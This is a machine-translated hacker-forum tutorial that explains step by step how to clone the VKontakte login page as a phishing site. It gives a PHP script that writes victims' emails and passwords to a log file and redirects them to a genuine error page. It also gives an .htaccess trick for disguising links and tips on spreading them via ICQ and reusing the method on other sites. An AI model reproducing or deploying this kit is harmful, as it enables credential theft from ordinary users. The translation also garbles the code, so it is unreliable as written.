This page has been robot translated, sorry for typos if any. Original content here.

In Eile gefälscht

[iNtrO]

Es war nichts, es war abends .... Eigentlich war ich bei meinem ersten Artikel (der erste auf Anti-Chat) daran gezogen, dass in der Rubrik Kaufen / Verkaufen / Tauschen / Werfen auf ein großes Thema ein Thema bei dem hekker prodoval feyki schon auf 10 vmz, und oft gefragt, um diese oder jene Fälschung zu schaffen ...
Ich werde Ihnen einen Artikel erzählen, wie Sie mit einer universellen Fälschung fast alles fälschen können, was entführt wird! Ich werde am Beispiel der gefälschten vkontakte zeigen.

[SeaRchINg]

Wir müssen also eine Ressource auswählen und alle Informationen sammeln, die wir brauchen, aber wir brauchen nur eine Kopie einiger Seiten. Wir gehen zu vkontakte.ru über Operu (!) . Wir drücken den Knopf, wir geben die login.pxp ein, wir nehmen sie für den Index unserer Fälschung. Wir drücken in der Oper: Fail -> Save as -> Im geöffneten Dialog unter dem Namen wählen Sie (standardmäßig gibt es das Web Archive ....) " HTML fehlgeschlagen mit Bildern " und der Graph wird benötigt Dateiname write index (oder login.htm - abhängig von der Seite)


Weiter geben wir dort unwirkliche Daten ein und wir kommen zu der Seite, auf der es geschrieben ist
Eine solche Postanschrift ist nicht registriert oder das Passwort ist falsch.
Wir speichern es auf die gleiche Weise, nur anstatt des Index schreiben wir schlecht .
Als nächstes fahren wir in Google.ru den Satz Vkontakte.ru, klicken Sie auf Weitere Ergebnisse mit vkontakte.ru » und suchen Sie nach etwas im Zusammenhang mit dem Kontakt eroy ... Auf der zweiten Seite fand ich VKontakte | Fehler (http://vkontakte.ru/blank.php?code=10)- denken Sie daran, wir brauchen diesen Link
USA, alles, was wir für Feyka von der Ressource brauchen, haben wir bereits.

[CoDiNg]

Steuern, jetzt werden wir das Anmeldeformular verwenden. Öffnen Sie unsere index.html und suchen Sie nach dem Anmeldeformular.
 <form method = "post" name = "login" id = "login" action = "login.php">

  <input type = "versteckt" name = "success_url" id = "success_url" value = "">
  <input type = "versteckt" name = "fail_url" id = "fail_url" value = "">

  <input type = "versteckt" name = "try_to_login" id = "try_to_login" value = "1">
  <table align = "center" cellpadding = 0 cellspacing = 7 border = 0 width = "40%">

  <tr>
  <td width = "100px">
  <span class = "gray"> Email: </ span>
  </ td>
  <td>

  <input class = "inputText" type = "text" name = "email" Wert = "" id = "email" size = "25" />

  <td>
  </ tr>
  <tr>
  <td>
  <span class = "gray"> Passwort: </ span>

  </ td>
  <td>
  <input class = "inputText" type = "Passwort" name = "übergeben" value = "" id = "pass" size = "25" />

  </ td>
  </ tr>
 
  <tr>
  <td>
  & nbsp;
  </ td>
  <td>

  <input style = "margin-top: 1px; vertical-align: middle;"  Alien-Computer </ small> Wenn Sie einen Alien-Computer verwenden,

  </ td>
  </ tr>
  <tr>
  <td>
  & nbsp;
  </ td>
  <td>
Von hier aus lernen wir 3 Dinge auswendig:
<form method = "post" name = "login" id = "login" action = "login.php">
<input class = "inputText" type = "text" name = "email" Wert = "" id = "email" size = "25" />
<input class = "inputText" type = "Passwort" name = " übergeben " value = "" id = "pass" size = "25" />
In diesen 3 Dingen liegt der erste Teil der Einzigartigkeit, in jedem sozialen Netzwerk oder emily oder anderswo, überall wird die Form des Inputs (field) in dieser Art sein (also nur die Namen der Felder), zum Beispiel in Klassenkameraden
<input id = "field_password" value = "" style = "width: 170px;" type = "password" size = "20" name = " st.password ">
Dh nur den Namen der Felder, Designelemente, aber die Funktion ist für alle gleich.
Jetzt erstellen wir eine php-Datei und nennen sie login.php , ihren Inhalt:

PHP-Code:
  <? php
 

/ *
#############
# by_NoNameZ #
###########
* /
$ f = fopen ( "log.txt" , "at" );
Herde ( $ f , 2 );
if ( preg_match ( "/^([.0-9a-z_-]+)@(([0-9a-z-]+\.)+[0-9a-z]{2.4})$/ $ _POST [ 'email' ]) &&! leer ( $ _POST [ 'password' ]))) {
fputs ( $ f , $ _POST [ 'email' ]. ;; " . $ _POST [ 'password' ]. " \ n " );
Header ( "Location: http: //" );
} else {
Header ( "Location: http: //" );
}
Herde ( $ f , 3 );
fclose ( $ f );
?>
Eigentlich schauen Sie sich das Skript an, ein paar Strings, aber das ist ziemlich normal gefälscht, seine Funktionalität:
Die übertragenen Variablen speichern, sie prüfen und je nach Verifikation umleiten.

Und jetzt kehren wir zu diesen 3 Zeilen zurück:
<form method = "post" name = "login" id = "login" action = " login.php ">
hier haben wir alles in Ordnung, der Name unseres Skripts stimmt mit dem Namen überein, es stimmt nicht überein, dann ersetzen wir es oder wir benennen es um.
<input class = "inputText" type = "text" name = "email" Wert = "" id = "email" size = "25" />
<input class = "inputText" type = "Passwort" name = "übergeben" value = "" id = "pass" size = "25" />
Von hier aus brauchen wir name = " email " und name = " pass "
Wir fügen sie in unser Skript an der richtigen Stelle ein
  <? php
 

/ *
#############
# by_NoNameZ #
###########
* /
$ f = fopen ( "log.txt" , "at" );
Herde ( $ f , 2 );
if ( preg_match ( "/^([.0-9a-z_-]+)@(([0-9a-z-]+\.)+[0-9a-z]{2.4})$/ ( $ pOST [ 'pass' ]))) {
fputs ( $ f , $ _POST [ 'email' ]. ;; " . $ _POST [ 'übergeben' ]. " \ n " );
Header ( "Location: http: //" );
} else {
Header ( "Location: http: //" );
}
Herde ( $ f , 3 );
fclose ( $ f );
?>
Wer es nicht bemerkt hat, ist $ _POST ['email'] und $ _POST ['pass']

Als nächstes sehen Sie das Skript, dann erscheint die IF ELSE-Funktion. Wenn das E-Mail-Feld der E-Mail entspricht (nickname@mylo.ru und nicht wie die Nachricht gesendet wird) und das Passwortfeld nicht leer ist, wird die erste Umleitung ausgeführt. das Pass-Feld ist leer, das zweite ist die Weiterleitung. Daraus folgt, dass, wenn der Chell in eine Seife und etwas ähnliches wie ein Pass, dann wir wirft es auf die Seite mit der Erotik http://vkontakte.ru/blank.php?code=10 , und wenn Sie Müll (hier betraten wir brauchten Kopie der Seite bad.html? Wenn wir die falschen Daten eingegeben haben), dann werfen Sie es zurück, Ie geben Sie bad.htm.

PHP-Code:
  <? php
 

/ *
#############
# by_NoNameZ #
###########
* /
$ f = fopen ( "log.txt" , "at" );
Herde ( $ f , 2 );
if ( preg_match ( "/^([.0-9a-z_-]+)@(([0-9a-z-]+\.)+[0-9a-z]{2.4})$/ ( $ pOST [ 'pass' ]))) {
fputs ( $ f , $ _POST [ 'email' ]. ;; " . $ _POST [ 'übergeben' ]. " \ n " );
Header ( "Ort: http://vkontakte.ru/blank.php?code=10" );
} else {
header ( "Location: bad.htm" );
}
Herde ( $ f , 3 );
fclose ( $ f );
?>
Wir speichern alle Mist auf dem Server (login.php, index.htm + Ordner mit Dateien, bad.htm + Ordner mit Dateien), erstellen Sie die Datei log.txt (Ich rufe meinen eindeutigen Namen auf, vergessen Sie nicht, das Skript zu ändern) ihm chmod777.

3) ein kleines Update ...

Dieses Update eignet sich sehr gut für SI, im Stammverzeichnis von ftp erstellen wir eine .htaccess- Datei mit folgendem Inhalt:

RewriteEngine ein
RewriteCond% {REQUEST_FILENAME}! -f
RewriteCond% {REQUEST_URI}! Index \ .htm
RewriteRule (. *) Index.htm? [QSA]

ACHTUNG !!!
! index \ .htm- auf diese Umleitung wird verwiesen, wenn Sie eine falsche login.html haben. dann müssen Sie den Index in der Anmeldung umbenennen.

Steuer, diese Datei gibt uns einen Link qualitativ qualitativ mehr, nämlich:
Ihr / irgendein Text, wenn Sie die Verbindungsstruktur der Fälschung kennen, zum Beispiel Kontakt, können wir das tun:


yourfake.ro/ photos.php? act = show & id = 15884695_588954334 & uid = 359648756 & self = 6
und vparit es auf ICQ))) zustimmen. weniger sichtbar jetzt gefälscht))

Das ist alles

[Die eND] Eigentlich ist das einzigartig, aber die Tatsache, dass Sie zu Klassenkameraden gehen können, speichern Sie auch die Seite, geben Sie Variablen ein, ersetzen Sie URLs (hier gebe ich sofort http://odnoklassniki.ru/dk?st.cmd=error) und alles, absolut auf die gleiche Weise gehen Sie auf mayile.ru, speichern Sie Variablen und ersetzen Sie und alle))) Das einzige, was Sie brauchen, ist Kreativität, wir speichern nicht die Hauptseite, sondern die Anmeldeseite.Sie können auch jedes Forum, wenn Sie einen acc an PM schicken
<a href="file"> Link zu einem Thema </a>
, und in der Fälschung geben Sie dieses Thema für die Weiterleitung an.